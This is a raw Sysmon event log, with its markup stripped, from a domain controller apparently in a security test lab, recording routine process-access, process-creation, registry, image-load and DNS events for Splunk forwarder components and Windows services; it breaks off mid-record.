10341000x80000000000000004540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F68-6005-F700-00000000A301}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F68-6005-F700-00000000A301}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8F68-6005-F700-00000000A301}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F69-6005-F900-00000000A301}2604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8F69-6005-F900-00000000A301}2604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F69-6005-F900-00000000A301}2604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:49.941{59A5CD1D-8F69-6005-F900-00000000A301}2604C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000004579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:38:59.504{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9f-0x46a88664) 10341000x80000000000000004586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:28.426{59A5CD1D-8E46-6005-1100-00000000A301}1172644C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000004585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:28.426{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:28.426{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000004583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:39:28.395{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x80000000000000004582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:39:28.395{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x80000000000000004581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:39:28.395{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 734700x80000000000000004580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:28.364{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\System32\dfsrs.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 22542200x80000000000000004587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:28.277{59A5CD1D-8E56-6005-2F00-00000000A301}2276win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 10341000x80000000000000004608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.380{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.380{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.380{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:39.380{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000004604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 